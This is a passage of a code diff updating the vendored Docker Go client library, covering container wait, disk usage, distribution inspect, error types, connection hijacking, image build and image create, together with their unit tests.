"github.com/docker/docker/client" import ( + "context" "encoding/json" - - "golang.org/x/net/context" + "net/url" "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/versions" ) -// ContainerWait pauses execution until a container exits. -// It returns the API status code as response of its readiness. -func (cli *Client) ContainerWait(ctx context.Context, containerID string) (int64, error) { - resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil) - if err != nil { - return -1, err +// ContainerWait waits until the specified container is in a certain state +// indicated by the given condition, either "not-running" (default), +// "next-exit", or "removed". +// +// If this client's API version is before 1.30, condition is ignored and +// ContainerWait will return immediately with the two channels, as the server +// will wait as if the condition were "not-running". +// +// If this client's API version is at least 1.30, ContainerWait blocks until +// the request has been acknowledged by the server (with a response header), +// then returns two channels on which the caller can wait for the exit status +// of the container or an error if there was a problem either beginning the +// wait request or in getting the response. This allows the caller to +// synchronize ContainerWait with other calls, such as specifying a +// "next-exit" condition before issuing a ContainerStart request. +func (cli *Client) ContainerWait(ctx context.Context, containerID string, condition container.WaitCondition) (<-chan container.ContainerWaitOKBody, <-chan error) { + if versions.LessThan(cli.ClientVersion(), "1.30") { + return cli.legacyContainerWait(ctx, containerID) } - defer ensureReaderClosed(resp) - var res container.ContainerWaitOKBody - if err := json.NewDecoder(resp.body).Decode(&res); err != nil { - return -1, err + resultC := make(chan container.ContainerWaitOKBody) + errC := make(chan error, 1) + + query := url.Values{} + query.Set("condition", string(condition)) + + resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", query, nil, nil) + if err != nil { + defer ensureReaderClosed(resp) + errC <- err + return resultC, errC } - return res.StatusCode, nil + go func() { + defer ensureReaderClosed(resp) + var res container.ContainerWaitOKBody + if err := json.NewDecoder(resp.body).Decode(&res); err != nil { + errC <- err + return + } + + resultC <- res + }() + + return resultC, errC +} + +// legacyContainerWait returns immediately and doesn't have an option to wait +// until the container is removed. +func (cli *Client) legacyContainerWait(ctx context.Context, containerID string) (<-chan container.ContainerWaitOKBody, <-chan error) { + resultC := make(chan container.ContainerWaitOKBody) + errC := make(chan error) + + go func() { + resp, err := cli.post(ctx, "/containers/"+containerID+"/wait", nil, nil, nil) + if err != nil { + errC <- err + return + } + defer ensureReaderClosed(resp) + + var res container.ContainerWaitOKBody + if err := json.NewDecoder(resp.body).Decode(&res); err != nil { + errC <- err + return + } + + resultC <- res + }() + + return resultC, errC } diff --git a/vendor/github.com/docker/docker/client/container_wait_test.go b/vendor/github.com/docker/docker/client/container_wait_test.go index 9300bc0a54..11a9203ddc 100644 --- a/vendor/github.com/docker/docker/client/container_wait_test.go +++ b/vendor/github.com/docker/docker/client/container_wait_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -12,20 +13,20 @@ import ( "time" "github.com/docker/docker/api/types/container" - - "golang.org/x/net/context" ) func TestContainerWaitError(t *testing.T) { client := &Client{ client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), } - code, err := client.ContainerWait(context.Background(), "nothing") - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) - } - if code != -1 { - t.Fatalf("expected a status code equal to '-1', got %d", code) + resultC, errC := client.ContainerWait(context.Background(), "nothing", "") + select { + case result := <-resultC: + t.Fatalf("expected to not get a wait result, got %d", result.StatusCode) + case err := <-errC: + if err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } } } @@ -49,12 +50,14 @@ func TestContainerWait(t *testing.T) { }), } - code, err := client.ContainerWait(context.Background(), "container_id") - if err != nil { + resultC, errC := client.ContainerWait(context.Background(), "container_id", "") + select { + case err := <-errC: t.Fatal(err) - } - if code != 15 { - t.Fatalf("expected a status code equal to '15', got %d", code) + case result := <-resultC: + if result.StatusCode != 15 { + t.Fatalf("expected a status code equal to '15', got %d", result.StatusCode) + } } } @@ -63,8 +66,8 @@ func ExampleClient_ContainerWait_withTimeout() { defer cancel() client, _ := NewEnvClient() - _, err := client.ContainerWait(ctx, "container_id") - if err != nil { + _, errC := client.ContainerWait(ctx, "container_id", "") + if err := <-errC; err != nil { log.Fatal(err) } } diff --git a/vendor/github.com/docker/docker/client/disk_usage.go b/vendor/github.com/docker/docker/client/disk_usage.go index 03c80b39af..8eb30eb5de 100644 --- a/vendor/github.com/docker/docker/client/disk_usage.go +++ b/vendor/github.com/docker/docker/client/disk_usage.go @@ -1,11 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // DiskUsage requests the current data usage from the daemon diff --git a/vendor/github.com/docker/docker/client/disk_usage_test.go b/vendor/github.com/docker/docker/client/disk_usage_test.go new file mode 100644 index 0000000000..3968f75e62 --- /dev/null +++ b/vendor/github.com/docker/docker/client/disk_usage_test.go @@ -0,0 +1,55 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" +) + +func TestDiskUsageError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.DiskUsage(context.Background()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestDiskUsage(t *testing.T) { + expectedURL := "/system/df" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + du := types.DiskUsage{ + LayersSize: int64(100), + Images: nil, + Containers: nil, + Volumes: nil, + } + + b, err := json.Marshal(du) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + if _, err := client.DiskUsage(context.Background()); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/distribution_inspect.go b/vendor/github.com/docker/docker/client/distribution_inspect.go new file mode 100644 index 0000000000..7245bbeeda --- /dev/null +++ b/vendor/github.com/docker/docker/client/distribution_inspect.go @@ -0,0 +1,38 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "encoding/json" + "net/url" + + registrytypes "github.com/docker/docker/api/types/registry" +) + +// DistributionInspect returns the image digest with full Manifest +func (cli *Client) DistributionInspect(ctx context.Context, image, encodedRegistryAuth string) (registrytypes.DistributionInspect, error) { + // Contact the registry to retrieve digest and platform information + var distributionInspect registrytypes.DistributionInspect + if image == "" { + return distributionInspect, objectNotFoundError{object: "distribution", id: image} + } + + if err := cli.NewVersionError("1.30", "distribution inspect"); err != nil { + return distributionInspect, err + } + var headers map[string][]string + + if encodedRegistryAuth != "" { + headers = map[string][]string{ + "X-Registry-Auth": {encodedRegistryAuth}, + } + } + + resp, err := cli.get(ctx, "/distribution/"+image+"/json", url.Values{}, headers) + if err != nil { + return distributionInspect, err + } + + err = json.NewDecoder(resp.body).Decode(&distributionInspect) + ensureReaderClosed(resp) + return distributionInspect, err +} diff --git a/vendor/github.com/docker/docker/client/distribution_inspect_test.go b/vendor/github.com/docker/docker/client/distribution_inspect_test.go new file mode 100644 index 0000000000..a23d5f55d5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/distribution_inspect_test.go @@ -0,0 +1,32 @@ +package client // import "github.com/docker/docker/client" + +import ( + "context" + "net/http" + "testing" + + "github.com/pkg/errors" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestDistributionInspectUnsupported(t *testing.T) { + client := &Client{ + version: "1.29", + client: &http.Client{}, + } + _, err := client.DistributionInspect(context.Background(), "foobar:1.0", "") + assert.Check(t, is.Error(err, `"distribution inspect" requires API version 1.30, but the Docker daemon API version is 1.29`)) +} + +func TestDistributionInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, err := client.DistributionInspect(context.Background(), "", "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} diff --git a/vendor/github.com/docker/docker/client/errors.go b/vendor/github.com/docker/docker/client/errors.go index bf6923f134..0461af329d 100644 --- a/vendor/github.com/docker/docker/client/errors.go +++ b/vendor/github.com/docker/docker/client/errors.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "fmt" + "net/http" "github.com/docker/docker/api/types/versions" "github.com/pkg/errors" @@ -36,95 +37,37 @@ type notFound interface { NotFound() bool // Is the error a NotFound error } -// IsErrNotFound returns true if the error is caused with an -// object (image, container, network, volume, …) is not found in the docker host. +// IsErrNotFound returns true if the error is a NotFound error, which is returned +// by the API when some object is not found. func IsErrNotFound(err error) bool { te, ok := err.(notFound) return ok && te.NotFound() } -// imageNotFoundError implements an error returned when an image is not in the docker host. -type imageNotFoundError struct { - imageID string +type objectNotFoundError struct { + object string + id string } -// NotFound indicates that this error type is of NotFound -func (e imageNotFoundError) NotFound() bool { +func (e objectNotFoundError) NotFound() bool { return true } -// Error returns a string representation of an imageNotFoundError -func (e imageNotFoundError) Error() string { - return fmt.Sprintf("Error: No such image: %s", e.imageID) +func (e objectNotFoundError) Error() string { + return fmt.Sprintf("Error: No such %s: %s", e.object, e.id) } -// IsErrImageNotFound returns true if the error is caused -// when an image is not found in the docker host. -func IsErrImageNotFound(err error) bool { - return IsErrNotFound(err) -} - -// containerNotFoundError implements an error returned when a container is not in the docker host. -type containerNotFoundError struct { - containerID string -} - -// NotFound indicates that this error type is of NotFound -func (e containerNotFoundError) NotFound() bool { - return true -} - -// Error returns a string representation of a containerNotFoundError -func (e containerNotFoundError) Error() string { - return fmt.Sprintf("Error: No such container: %s", e.containerID) -} - -// IsErrContainerNotFound returns true if the error is caused -// when a container is not found in the docker host. -func IsErrContainerNotFound(err error) bool { - return IsErrNotFound(err) -} - -// networkNotFoundError implements an error returned when a network is not in the docker host. -type networkNotFoundError struct { - networkID string -} - -// NotFound indicates that this error type is of NotFound -func (e networkNotFoundError) NotFound() bool { - return true -} - -// Error returns a string representation of a networkNotFoundError -func (e networkNotFoundError) Error() string { - return fmt.Sprintf("Error: No such network: %s", e.networkID) -} - -// IsErrNetworkNotFound returns true if the error is caused -// when a network is not found in the docker host. -func IsErrNetworkNotFound(err error) bool { - return IsErrNotFound(err) -} - -// volumeNotFoundError implements an error returned when a volume is not in the docker host. -type volumeNotFoundError struct { - volumeID string -} - -// NotFound indicates that this error type is of NotFound -func (e volumeNotFoundError) NotFound() bool { - return true -} - -// Error returns a string representation of a volumeNotFoundError -func (e volumeNotFoundError) Error() string { - return fmt.Sprintf("Error: No such volume: %s", e.volumeID) -} - -// IsErrVolumeNotFound returns true if the error is caused -// when a volume is not found in the docker host. -func IsErrVolumeNotFound(err error) bool { - return IsErrNotFound(err) +func wrapResponseError(err error, resp serverResponse, object, id string) error { + switch { + case err == nil: + return nil + case resp.statusCode == http.StatusNotFound: + return objectNotFoundError{object: object, id: id} + case resp.statusCode == http.StatusNotImplemented: + return notImplementedError{message: err.Error()} + default: + return err + } } // unauthorizedError represents an authorization error in a remote registry. @@ -144,72 +87,6 @@ func IsErrUnauthorized(err error) bool { return ok } -// nodeNotFoundError implements an error returned when a node is not found. -type nodeNotFoundError struct { - nodeID string -} - -// Error returns a string representation of a nodeNotFoundError -func (e nodeNotFoundError) Error() string { - return fmt.Sprintf("Error: No such node: %s", e.nodeID) -} - -// NotFound indicates that this error type is of NotFound -func (e nodeNotFoundError) NotFound() bool { - return true -} - -// IsErrNodeNotFound returns true if the error is caused -// when a node is not found. -func IsErrNodeNotFound(err error) bool { - _, ok := err.(nodeNotFoundError) - return ok -} - -// serviceNotFoundError implements an error returned when a service is not found. -type serviceNotFoundError struct { - serviceID string -} - -// Error returns a string representation of a serviceNotFoundError -func (e serviceNotFoundError) Error() string { - return fmt.Sprintf("Error: No such service: %s", e.serviceID) -} - -// NotFound indicates that this error type is of NotFound -func (e serviceNotFoundError) NotFound() bool { - return true -} - -// IsErrServiceNotFound returns true if the error is caused -// when a service is not found. -func IsErrServiceNotFound(err error) bool { - _, ok := err.(serviceNotFoundError) - return ok -} - -// taskNotFoundError implements an error returned when a task is not found. -type taskNotFoundError struct { - taskID string -} - -// Error returns a string representation of a taskNotFoundError -func (e taskNotFoundError) Error() string { - return fmt.Sprintf("Error: No such task: %s", e.taskID) -} - -// NotFound indicates that this error type is of NotFound -func (e taskNotFoundError) NotFound() bool { - return true -} - -// IsErrTaskNotFound returns true if the error is caused -// when a task is not found. -func IsErrTaskNotFound(err error) bool { - _, ok := err.(taskNotFoundError) - return ok -} - type pluginPermissionDenied struct { name string } @@ -225,54 +102,31 @@ func IsErrPluginPermissionDenied(err error) bool { return ok } -// NewVersionError returns an error if the APIVersion required -// if less than the current supported version -func (cli *Client) NewVersionError(APIrequired, feature string) error { - if versions.LessThan(cli.version, APIrequired) { - return fmt.Errorf("%q requires API version %s, but the Docker server is version %s", feature, APIrequired, cli.version) - } - return nil -} - -// secretNotFoundError implements an error returned when a secret is not found. -type secretNotFoundError struct { - name string -} - -// Error returns a string representation of a secretNotFoundError -func (e secretNotFoundError) Error() string { - return fmt.Sprintf("Error: no such secret: %s", e.name) -} - -// NoFound indicates that this error type is of NotFound -func (e secretNotFoundError) NotFound() bool { - return true +type notImplementedError struct { + message string } -// IsErrSecretNotFound returns true if the error is caused -// when a secret is not found. -func IsErrSecretNotFound(err error) bool { - _, ok := err.(secretNotFoundError) - return ok -} - -// pluginNotFoundError implements an error returned when a plugin is not in the docker host. -type pluginNotFoundError struct { - name string +func (e notImplementedError) Error() string { + return e.message } -// NotFound indicates that this error type is of NotFound -func (e pluginNotFoundError) NotFound() bool { +func (e notImplementedError) NotImplemented() bool { return true } -// Error returns a string representation of a pluginNotFoundError -func (e pluginNotFoundError) Error() string { - return fmt.Sprintf("Error: No such plugin: %s", e.name) +// IsErrNotImplemented returns true if the error is a NotImplemented error. +// This is returned by the API when a requested feature has not been +// implemented. +func IsErrNotImplemented(err error) bool { + te, ok := err.(notImplementedError) + return ok && te.NotImplemented() } -// IsErrPluginNotFound returns true if the error is caused -// when a plugin is not found in the docker host. -func IsErrPluginNotFound(err error) bool { - return IsErrNotFound(err) +// NewVersionError returns an error if the APIVersion required +// if less than the current supported version +func (cli *Client) NewVersionError(APIrequired, feature string) error { + if cli.version != "" && versions.LessThan(cli.version, APIrequired) { + return fmt.Errorf("%q requires API version %s, but the Docker daemon API version is %s", feature, APIrequired, cli.version) + } + return nil } diff --git a/vendor/github.com/docker/docker/client/events.go b/vendor/github.com/docker/docker/client/events.go index af47aefa74..6e56538955 100644 --- a/vendor/github.com/docker/docker/client/events.go +++ b/vendor/github.com/docker/docker/client/events.go @@ -1,12 +1,11 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "time" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/events" "github.com/docker/docker/api/types/filters" diff --git a/vendor/github.com/docker/docker/client/events_test.go b/vendor/github.com/docker/docker/client/events_test.go index ba82d2f542..4a39901b45 100644 --- a/vendor/github.com/docker/docker/client/events_test.go +++ b/vendor/github.com/docker/docker/client/events_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io" @@ -10,8 +11,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/events" "github.com/docker/docker/api/types/filters" diff --git a/vendor/github.com/docker/docker/client/hijack.go b/vendor/github.com/docker/docker/client/hijack.go index 74c53f52b3..35f5dd86dc 100644 --- a/vendor/github.com/docker/docker/client/hijack.go +++ b/vendor/github.com/docker/docker/client/hijack.go @@ -1,37 +1,21 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "bufio" + "context" "crypto/tls" - "errors" "fmt" "net" "net/http" "net/http/httputil" "net/url" - "strings" "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/tlsconfig" "github.com/docker/go-connections/sockets" - "golang.org/x/net/context" + "github.com/pkg/errors" ) -// tlsClientCon holds tls information and a dialed connection. -type tlsClientCon struct { - *tls.Conn - rawConn net.Conn -} - -func (c *tlsClientCon) CloseWrite() error { - // Go standard tls.Conn doesn't provide the CloseWrite() method so we do it - // on its underlying connection. - if conn, ok := c.rawConn.(types.CloseWriter); ok { - return conn.CloseWrite() - } - return nil -} - // postHijacked sends a POST request and hijacks the connection. func (cli *Client) postHijacked(ctx context.Context, path string, query url.Values, body interface{}, headers map[string][]string) (types.HijackedResponse, error) { bodyEncoded, err := encodeData(body) @@ -46,16 +30,32 @@ func (cli *Client) postHijacked(ctx context.Context, path string, query url.Valu } req = cli.addHeaders(req, headers) + conn, err := cli.setupHijackConn(req, "tcp") + if err != nil { + return types.HijackedResponse{}, err + } + + return types.HijackedResponse{Conn: conn, Reader: bufio.NewReader(conn)}, err +} + +func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) { + if tlsConfig != nil && proto != "unix" && proto != "npipe" { + return tls.Dial(proto, addr, tlsConfig) + } + if proto == "npipe" { + return sockets.DialPipe(addr, 32*time.Second) + } + return net.Dial(proto, addr) +} + +func (cli *Client) setupHijackConn(req *http.Request, proto string) (net.Conn, error) { req.Host = cli.addr req.Header.Set("Connection", "Upgrade") - req.Header.Set("Upgrade", "tcp") + req.Header.Set("Upgrade", proto) conn, err := dial(cli.proto, cli.addr, resolveTLSConfig(cli.client.Transport)) if err != nil { - if strings.Contains(err.Error(), "connection refused") { - return types.HijackedResponse{}, fmt.Errorf("Cannot connect to the Docker daemon. Is 'docker daemon' running on this host?") - } - return types.HijackedResponse{}, err + return nil, errors.Wrap(err, "cannot connect to the Docker daemon. Is 'docker daemon' running on this host?") } // When we set up a TCP connection for hijack, there could be long periods @@ -72,106 +72,58 @@ func (cli *Client) postHijacked(ctx context.Context, path string, query url.Valu defer clientconn.Close() // Server hijacks the connection, error 'connection closed' expected - _, err = clientconn.Do(req) - - rwc, br := clientconn.Hijack() - - return types.HijackedResponse{Conn: rwc, Reader: br}, err -} - -func tlsDial(network, addr string, config *tls.Config) (net.Conn, error) { - return tlsDialWithDialer(new(net.Dialer), network, addr, config) -} - -// We need to copy Go's implementation of tls.Dial (pkg/cryptor/tls/tls.go) in -// order to return our custom tlsClientCon struct which holds both the tls.Conn -// object _and_ its underlying raw connection. The rationale for this is that -// we need to be able to close the write end of the connection when attaching, -// which tls.Conn does not provide. -func tlsDialWithDialer(dialer *net.Dialer, network, addr string, config *tls.Config) (net.Conn, error) { - // We want the Timeout and Deadline values from dialer to cover the - // whole process: TCP connection and TLS handshake. This means that we - // also need to start our own timers now. - timeout := dialer.Timeout - - if !dialer.Deadline.IsZero() { - deadlineTimeout := dialer.Deadline.Sub(time.Now()) - if timeout == 0 || deadlineTimeout < timeout { - timeout = deadlineTimeout + resp, err := clientconn.Do(req) + if err != httputil.ErrPersistEOF { + if err != nil { + return nil, err + } + if resp.StatusCode != http.StatusSwitchingProtocols { + resp.Body.Close() + return nil, fmt.Errorf("unable to upgrade to %s, received %d", proto, resp.StatusCode) } } - var errChannel chan error - - if timeout != 0 { - errChannel = make(chan error, 2) - time.AfterFunc(timeout, func() { - errChannel <- errors.New("") - }) - } - - proxyDialer, err := sockets.DialerFromEnvironment(dialer) - if err != nil { - return nil, err - } - - rawConn, err := proxyDialer.Dial(network, addr) - if err != nil { - return nil, err - } - // When we set up a TCP connection for hijack, there could be long periods - // of inactivity (a long running command with no output) that in certain - // network setups may cause ECONNTIMEOUT, leaving the client in an unknown - // state. Setting TCP KeepAlive on the socket connection will prohibit - // ECONNTIMEOUT unless the socket connection truly is broken - if tcpConn, ok := rawConn.(*net.TCPConn); ok { - tcpConn.SetKeepAlive(true) - tcpConn.SetKeepAlivePeriod(30 * time.Second) - } - - colonPos := strings.LastIndex(addr, ":") - if colonPos == -1 { - colonPos = len(addr) - } - hostname := addr[:colonPos] - - // If no ServerName is set, infer the ServerName - // from the hostname we're connecting to. - if config.ServerName == "" { - // Make a copy to avoid polluting argument or default. - config = tlsconfig.Clone(config) - config.ServerName = hostname + c, br := clientconn.Hijack() + if br.Buffered() > 0 { + // If there is buffered content, wrap the connection. We return an + // object that implements CloseWrite iff the underlying connection + // implements it. + if _, ok := c.(types.CloseWriter); ok { + c = &hijackedConnCloseWriter{&hijackedConn{c, br}} + } else { + c = &hijackedConn{c, br} + } + } else { + br.Reset(nil) } - conn := tls.Client(rawConn, config) - - if timeout == 0 { - err = conn.Handshake() - } else { - go func() { - errChannel <- conn.Handshake() - }() + return c, nil +} - err = <-errChannel - } +// hijackedConn wraps a net.Conn and is returned by setupHijackConn in the case +// that a) there was already buffered data in the http layer when Hijack() was +// called, and b) the underlying net.Conn does *not* implement CloseWrite(). +// hijackedConn does not implement CloseWrite() either. +type hijackedConn struct { + net.Conn + r *bufio.Reader +} - if err != nil { - rawConn.Close() - return nil, err - } +func (c *hijackedConn) Read(b []byte) (int, error) { + return c.r.Read(b) +} - // This is Docker difference with standard's crypto/tls package: returned a - // wrapper which holds both the TLS and raw connections. - return &tlsClientCon{conn, rawConn}, nil +// hijackedConnCloseWriter is a hijackedConn which additionally implements +// CloseWrite(). It is returned by setupHijackConn in the case that a) there +// was already buffered data in the http layer when Hijack() was called, and b) +// the underlying net.Conn *does* implement CloseWrite(). +type hijackedConnCloseWriter struct { + *hijackedConn } -func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) { - if tlsConfig != nil && proto != "unix" && proto != "npipe" { - // Notice this isn't Go standard's tls.Dial function - return tlsDial(proto, addr, tlsConfig) - } - if proto == "npipe" { - return sockets.DialPipe(addr, 32*time.Second) - } - return net.Dial(proto, addr) +var _ types.CloseWriter = &hijackedConnCloseWriter{} + +func (c *hijackedConnCloseWriter) CloseWrite() error { + conn := c.Conn.(types.CloseWriter) + return conn.CloseWrite() } diff --git a/vendor/github.com/docker/docker/client/hijack_test.go b/vendor/github.com/docker/docker/client/hijack_test.go new file mode 100644 index 0000000000..823bf344f5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/hijack_test.go @@ -0,0 +1,103 @@ +package client + +import ( + "fmt" + "io/ioutil" + "net" + "net/http" + "net/http/httptest" + "net/url" + "testing" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/pkg/errors" + "golang.org/x/net/context" + "gotest.tools/assert" +) + +func TestTLSCloseWriter(t *testing.T) { + t.Parallel() + + var chErr chan error + ts := &httptest.Server{Config: &http.Server{Handler: http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) { + chErr = make(chan error, 1) + defer close(chErr) + if err := httputils.ParseForm(req); err != nil { + chErr <- errors.Wrap(err, "error parsing form") + http.Error(w, err.Error(), 500) + return + } + r, rw, err := httputils.HijackConnection(w) + if err != nil { + chErr <- errors.Wrap(err, "error hijacking connection") + http.Error(w, err.Error(), 500) + return + } + defer r.Close() + + fmt.Fprint(rw, "HTTP/1.1 101 UPGRADED\r\nContent-Type: application/vnd.docker.raw-stream\r\nConnection: Upgrade\r\nUpgrade: tcp\r\n\n") + + buf := make([]byte, 5) + _, err = r.Read(buf) + if err != nil { + chErr <- errors.Wrap(err, "error reading from client") + return + } + _, err = rw.Write(buf) + if err != nil { + chErr <- errors.Wrap(err, "error writing to client") + return + } + })}} + + var ( + l net.Listener + err error + ) + for i := 1024; i < 10000; i++ { + l, err = net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%d", i)) + if err == nil { + break + } + } + assert.Assert(t, err) + + ts.Listener = l + defer l.Close() + + defer func() { + if chErr != nil { + assert.Assert(t, <-chErr) + } + }() + + ts.StartTLS() + defer ts.Close() + + serverURL, err := url.Parse(ts.URL) + assert.Assert(t, err) + + client, err := NewClient("tcp://"+serverURL.Host, "", ts.Client(), nil) + assert.Assert(t, err) + + resp, err := client.postHijacked(context.Background(), "/asdf", url.Values{}, nil, map[string][]string{"Content-Type": {"text/plain"}}) + assert.Assert(t, err) + defer resp.Close() + + if _, ok := resp.Conn.(types.CloseWriter); !ok { + t.Fatal("tls conn did not implement the CloseWrite interface") + } + + _, err = resp.Conn.Write([]byte("hello")) + assert.Assert(t, err) + + b, err := ioutil.ReadAll(resp.Reader) + assert.Assert(t, err) + assert.Assert(t, string(b) == "hello") + assert.Assert(t, resp.CloseWrite()) + + // This should error since writes are closed + _, err = resp.Conn.Write([]byte("no")) + assert.Assert(t, err != nil) +} diff --git a/vendor/github.com/docker/docker/client/image_build.go b/vendor/github.com/docker/docker/client/image_build.go index 6fde75dcfd..dff19b989f 100644 --- a/vendor/github.com/docker/docker/client/image_build.go +++ b/vendor/github.com/docker/docker/client/image_build.go @@ -1,14 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/base64" "encoding/json" "io" "net/http" "net/url" "strconv" - - "golang.org/x/net/context" + "strings" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" @@ -29,7 +29,14 @@ func (cli *Client) ImageBuild(ctx context.Context, buildContext io.Reader, optio return types.ImageBuildResponse{}, err } headers.Add("X-Registry-Config", base64.URLEncoding.EncodeToString(buf)) - headers.Set("Content-Type", "application/tar") + + if options.Platform != "" { + if err := cli.NewVersionError("1.32", "platform"); err != nil { + return types.ImageBuildResponse{}, err + } + query.Set("platform", options.Platform) + } + headers.Set("Content-Type", "application/x-tar") serverResp, err := cli.postRaw(ctx, "/build", query, buildContext, headers) if err != nil { @@ -48,6 +55,7 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur query := url.Values{ "t": options.Tags, "securityopt": options.SecurityOpt, + "extrahosts": options.ExtraHosts, } if options.SuppressOutput { query.Set("q", "1") @@ -94,6 +102,7 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur query.Set("cgroupparent", options.CgroupParent) query.Set("shmsize", strconv.FormatInt(options.ShmSize, 10)) query.Set("dockerfile", options.Dockerfile) + query.Set("target", options.Target) ulimitsJSON, err := json.Marshal(options.Ulimits) if err != nil { @@ -118,6 +127,15 @@ func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (ur return query, err } query.Set("cachefrom", string(cacheFromJSON)) - + if options.SessionID != "" { + query.Set("session", options.SessionID) + } + if options.Platform != "" { + query.Set("platform", strings.ToLower(options.Platform)) + } + if options.BuildID != "" { + query.Set("buildid", options.BuildID) + } + query.Set("version", string(options.Version)) return query, nil } diff --git a/vendor/github.com/docker/docker/client/image_build_test.go b/vendor/github.com/docker/docker/client/image_build_test.go index b9d04f817a..95c11bc3e5 100644 --- a/vendor/github.com/docker/docker/client/image_build_test.go +++ b/vendor/github.com/docker/docker/client/image_build_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -9,8 +10,6 @@ import ( "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/container" "github.com/docker/go-units" @@ -170,8 +169,8 @@ func TestImageBuild(t *testing.T) { return nil, fmt.Errorf("X-Registry-Config header not properly set in the request. Expected '%s', got %s", buildCase.expectedRegistryConfig, registryConfig) } contentType := r.Header.Get("Content-Type") - if contentType != "application/tar" { - return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/tar', got %s", contentType) + if contentType != "application/x-tar" { + return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/x-tar', got %s", contentType) } // Check query parameters diff --git a/vendor/github.com/docker/docker/client/image_create.go b/vendor/github.com/docker/docker/client/image_create.go index cf023a7186..239380474e 100644 --- a/vendor/github.com/docker/docker/client/image_create.go +++ b/vendor/github.com/docker/docker/client/image_create.go @@ -1,26 +1,29 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" + "strings" - "golang.org/x/net/context" - + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/reference" ) // ImageCreate creates a new image based in the parent options. // It returns the JSON content in the response body. func (cli *Client) ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) { - repository, tag, err := reference.Parse(parentReference) + ref, err := reference.ParseNormalizedNamed(parentReference) if err != nil { return nil, err } query := url.Values{} - query.Set("fromImage", repository) - query.Set("tag", tag) + query.Set("fromImage", reference.FamiliarName(ref)) + query.Set("tag", getAPITagFromNamedRef(ref)) + if options.Platform != "" { + query.Set("platform", strings.ToLower(options.Platform)) + } resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth) if err != nil { return nil, err diff --git a/vendor/github.com/docker/docker/client/image_create_test.go b/vendor/github.com/docker/docker/client/image_create_test.go index 5c2edd2ad5..b89f16d27b 100644 --- a/vendor/github.com/docker/docker/client/image_create_test.go +++ b/vendor/github.com/docker/docker/client/image_create_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/image_history.go b/vendor/github.com/docker/docker/client/image_history.go index acb1ee9278..0151b9517f 100644 --- a/vendor/github.com/docker/docker/client/image_history.go +++ b/vendor/github.com/docker/docker/client/image_history.go @@ -1,16 +1,16 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/image" ) // ImageHistory returns the changes in an image in history format. -func 